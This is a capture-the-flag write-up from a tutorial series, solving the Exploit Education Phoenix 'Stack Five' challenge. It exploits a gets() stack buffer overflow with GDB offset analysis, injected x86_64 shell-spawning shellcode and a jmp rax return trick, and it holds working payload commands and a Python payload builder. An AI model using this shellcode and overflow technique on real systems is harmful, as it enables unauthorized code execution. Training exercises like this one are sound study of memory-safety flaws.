Exploit Education Phoenix : Stack Five

Exploit Education Phoenix - This article is part of a series.

Part 1: Exploit Education Phoenix : Stack Zero

Part 2: Exploit Education Phoenix : Stack One

Part 3: Exploit Education Phoenix : Stack Two

Part 4: Exploit Education Phoenix : Stack Three

Part 5: Exploit Education Phoenix : Stack Four

Part 6: This Article

Part 7: Exploit Education Phoenix : Stack Six

Part 8: Exploit Education Phoenix : Format Zero

Part 9: Exploit Education Phoenix : Format One

Before you look at the solution, I invite you to try the challenge for yourself. You can find all the challenges here.

Overview of the challenge #

The aim of the Phoenix challenges is to analyse the source code of an executable in order to find and exploit a vulnerability. This first series of challenges concerns the stack.

The first thing to do is to analyse the executable’s source code, looking for a vulnerability to exploit.

char *gets(char *);

void start_level() {
  char buffer[128];
  gets(buffer);
}

int main(int argc, char **argv) {
  printf("%s\n", BANNER);
  start_level();
}

First of all, we notice that, unlike the earlier challenges, this one no longer declares a struct. What’s more, the complete_level function that we previously had to call to complete the challenge is no longer present. As with the previous challenge, the aim is to practise hijacking the saved return address with a stack-based buffer overflow. However, this time, instead of returning into complete_level, we have to return into shellcode that we inject ourselves and that opens a shell.

The next thing we notice is the use of the gets function. Its documentation (man gets) explains how it works: gets reads characters from standard input (stdin) and writes them to a buffer until it encounters a line feed or EOF. The line feed is not stored; a \0 is written in its place to terminate the string.

The documentation also tells us that this function should no longer be used, because it is vulnerable to buffer overflows. gets is never told the size of the buffer, so it cannot limit the number of characters it copies. If the input is longer than the buffer, gets simply keeps writing into the memory that follows it.
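To make the overflow concrete, here is a minimal Python sketch that models the stack frame of start_level as a plain bytearray. It is only a toy model, not real memory: the layout (128-byte buffer, 8-byte saved rbp, 8-byte return address) and the names unsafe_gets and frame are assumptions made for illustration.

```python
# Toy model of start_level()'s stack frame. This is NOT real memory, only a
# bytearray laid out as: buffer (128) | saved rbp (8) | return address (8).
BUFFER_SIZE = 128
RET_SLOT = BUFFER_SIZE + 8  # assumed position of the saved return address


def unsafe_gets(frame: bytearray, data: bytes) -> None:
    """Copy one line into the frame without any bounds check, like gets()."""
    line = data.split(b"\n", 1)[0] + b"\x00"  # stop at newline, add the NUL
    frame[0:len(line)] = line                 # nothing stops at BUFFER_SIZE


frame = bytearray(BUFFER_SIZE + 16)
# Pretend the function was called from main and must return to 0x4005c7.
frame[RET_SLOT:RET_SLOT + 8] = (0x4005C7).to_bytes(8, "little")

# 136 filler bytes reach the return address slot, the next 4 overwrite it.
unsafe_gets(frame, b"A" * 136 + b"\xef\xbe\xad\xde\n")

saved_ret = int.from_bytes(frame[RET_SLOT:RET_SLOT + 8], "little")
print(hex(saved_ret))  # 0xdeadbeef
```

The input is longer than the 128-byte buffer, so the copy runs over the saved rbp and replaces the return address with a value chosen by the attacker.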

Now that we’ve identified the sensitive parts of the source code, all we have to do is abuse the vulnerability to succeed in the challenge.

Exploiting the vulnerability #

To succeed in this challenge, we need to exploit the buffer overflow to overwrite the saved return address, so that start_level returns into our shellcode and opens a new shell. To build the exploit, we need three pieces of information:

Address of buffer vulnerable to buffer overflow
Address of the memory location containing the return address
An x86_64 shellcode that opens a new shell

From the buffer address and the address of the memory location containing the return address, we can calculate the offset between the two, which tells us how many bytes we must write before reaching the return address. We place the shellcode at the start of the buffer, pad up to that offset, and then append the address of the start of the buffer so that it overwrites the return address. When start_level returns, execution jumps to the buffer and the shellcode opens the shell.

To find all these parameters, we’ll use GDB.

Offset calculation #

The stack addresses seen inside GDB can differ slightly from those outside it, because GDB adds environment variables of its own. This can cause problems when testing the exploit outside GDB. To fix this, remove the extra environment variables: the show env command lists them and unset env <var_name> removes one. In my case, I had to remove the variables LINES and COLUMNS.

To find the address of the buffer, it is possible to fill the buffer and inspect the stack to find the address. To inspect the stack at the right time, we can place a breakpoint just after the gets function is called in the start_level function.

$ gdb stack-five
(gdb) disass start_level
(gdb) b *0x00000000004005a1
(gdb) run < <(python -c "print 'A'*100")
(gdb) x/100x $rsp

Figure: breakpoint hit, showing the stack.

Thanks to the stack inspection, we now know the buffer address: 0x7FFFFFFFE5E0. The same stack dump also contains the saved return address. To recognise it, we disassemble the main function, which calls start_level, and note the address of the instruction just after the call, since this is where the CPU resumes after the ret instruction in start_level.

$ gdb stack-five
(gdb) disass main

Figure: disassembly of the `main` function.

In the disassembly, the instruction that follows the call to start_level is at 0x00000000004005c7. Looking for this value in the stack dump, we find it at 0x7FFFFFFFE668, which is therefore the memory location containing the return address.

We can now calculate the offset between the start of the buffer and the location of the return address: 0x7FFFFFFFE668 - 0x7FFFFFFFE5E0 = 0x88 = 136.
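The subtraction is easy to check in Python. This short sketch uses the two addresses read from the stack earlier (the buffer at 0x7FFFFFFFE5E0 and the return address slot at 0x7FFFFFFFE668); the variable names are my own.

```python
# Addresses observed in GDB during this session; they will differ elsewhere.
buffer_addr = 0x7FFFFFFFE5E0    # start of buffer
ret_slot_addr = 0x7FFFFFFFE668  # stack slot holding the saved return address

offset = ret_slot_addr - buffer_addr
print(hex(offset), offset)  # 0x88 136
```

The result, 136, is consistent with a 128-byte buffer followed by an 8-byte saved rbp before the return address.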

Constructing the malicious string #

We now have all we need to exploit the vulnerability. The malicious string consists of a 57-byte shellcode that opens a shell, followed by 79 NOP bytes (0x90) as padding to reach the return address (57 + 79 = 136), and finally the address of the buffer in little-endian byte order.

I didn’t write the shellcode myself; you can find it here, and credit goes to its author.

To make it easier to create the string, we can use Python.

python -c "print '\x48\x31\xc0\x50\x5f\xb0\x03\x0f\x05\x50\x48\xbf\x2f\x64\x65\x76\x2f\x74\x74\x79\x57\x54\x5f\x50\x5e\x66\xbe\x02\x27\xb0\x02\x0f\x05\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x50\x57\x54\x5e\x48\x99\xb0\x3b\x0f\x05' + '\x90'*79 + '\xE0\xE5\xFF\xFF\xFF\x7F'" | ./stack-five
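The one-liner above relies on Python 2, where print writes raw bytes. As a hedged alternative, here is a sketch of the same payload for Python 3. The script name exploit.py, the build_payload helper and the --raw flag are my own choices, and the buffer address is the one observed in my GDB session, so it will probably differ on another machine.

```python
import struct
import sys

# The 57-byte shellcode used in the one-liner above (not written by me).
SHELLCODE = (
    b"\x48\x31\xc0\x50\x5f\xb0\x03\x0f\x05\x50\x48\xbf\x2f\x64\x65\x76"
    b"\x2f\x74\x74\x79\x57\x54\x5f\x50\x5e\x66\xbe\x02\x27\xb0\x02\x0f"
    b"\x05\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x50"
    b"\x57\x54\x5e\x48\x99\xb0\x3b\x0f\x05"
)
OFFSET = 136                  # distance from buffer to the return address
BUFFER_ADDR = 0x7FFFFFFFE5E0  # assumption: value seen in GDB on my machine


def build_payload(shellcode: bytes, offset: int, ret_addr: int) -> bytes:
    """Return shellcode + NOP padding + little-endian return address."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    padding = b"\x90" * (offset - len(shellcode))
    # Only the 6 low bytes are sent: gets() appends a NUL byte and the top
    # byte of the saved return address is already zero.
    return shellcode + padding + struct.pack("<Q", ret_addr)[:6]


payload = build_payload(SHELLCODE, OFFSET, BUFFER_ADDR)

if __name__ == "__main__":
    if "--raw" in sys.argv[1:]:
        # Raw bytes for the target; print() would re-encode bytes >= 0x80.
        sys.stdout.buffer.write(payload + b"\n")
    else:
        print(len(payload), payload.hex())
```

Saved as exploit.py, it could be used as python3 exploit.py --raw | ./stack-five. Without the flag it only prints the payload length and its hex dump, which is handy for checking the layout.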

Figure: result of exploiting the vulnerability.

Finally, we can see that we’ve opened a new shell, so we’ve succeeded in our challenge.

Make it better #

There is a more robust way to avoid depending on the exact buffer address. On success, gets returns the buffer address, so that address is in the rax register after the call. Provided rax is not modified before start_level returns, we do not need to write the buffer address into the return address: we can instead look for a jmp rax instruction in the binary and write the address of that instruction there.

To do this, I use Binary Ninja to search for the hexadecimal byte sequence FF E0, which encodes the jmp rax instruction. The search returns two addresses that point to a jmp rax instruction; for our test we’ll use 0x4004c3.
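If you don't have Binary Ninja, the same byte search can be sketched in a few lines of Python. The find_all helper below is hypothetical and only reports offsets within the bytes it is given; the sample data is made up to show the behaviour.

```python
def find_all(data: bytes, pattern: bytes) -> list:
    """Return every offset in data at which pattern starts."""
    offsets = []
    start = data.find(pattern)
    while start != -1:
        offsets.append(start)
        start = data.find(pattern, start + 1)
    return offsets


JMP_RAX = b"\xff\xe0"  # machine code for jmp rax

# Made-up bytes for illustration; on the real target you would read the file
# instead, e.g. data = open("stack-five", "rb").read().
sample = b"\x90\x90\xff\xe0\xc3\x48\xff\xe0"
print(find_all(sample, JMP_RAX))  # [2, 6]
```

Keep in mind that these are file offsets, not virtual addresses. Assuming the binary is not position-independent and its first segment maps file offset 0 at 0x400000 (worth confirming with readelf -l), an offset of 0x4c3 would correspond to the address 0x4004c3. A match can also fall in data or in the middle of another instruction, so each hit should be checked in a disassembler.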

We can now create our new character string.

$ python -c "print '\x48\x31\xc0\x50\x5f\xb0\x03\x0f\x05\x50\x48\xbf\x2f\x64\x65\x76\x2f\x74\x74\x79\x57\x54\x5f\x50\x5e\x66\xbe\x02\x27\xb0\x02\x0f\x05\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x50\x57\x54\x5e\x48\x99\xb0\x3b\x0f\x05' + '\x90'*79 + '\xC3\x04\x40'" | ./stack-five
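Only three address bytes are sent in the command above. The following sketch shows why that is enough, assuming the saved return address originally holds 0x4005c7 (the address found in main earlier); the variable names are my own.

```python
import struct

JMP_RAX_ADDR = 0x4004C3  # address of the jmp rax instruction chosen above

packed = struct.pack("<Q", JMP_RAX_ADDR)  # full 8-byte little-endian value
print(packed.hex())                       # c304400000000000

low_bytes = packed.rstrip(b"\x00")        # the bytes we actually send
print(low_bytes.hex())                    # c30440

# The slot originally holds 0x4005c7, whose upper five bytes are zero.
original = struct.pack("<Q", 0x4005C7)
# gets() writes our 3 bytes plus a NUL; the rest of the slot is untouched.
after = low_bytes + b"\x00" + original[len(low_bytes) + 1:]
print(hex(struct.unpack("<Q", after)[0]))  # 0x4004c3
```

Because the upper bytes of the slot are already zero, the three low bytes and the NUL written by gets are enough to make the return address equal to 0x4004c3.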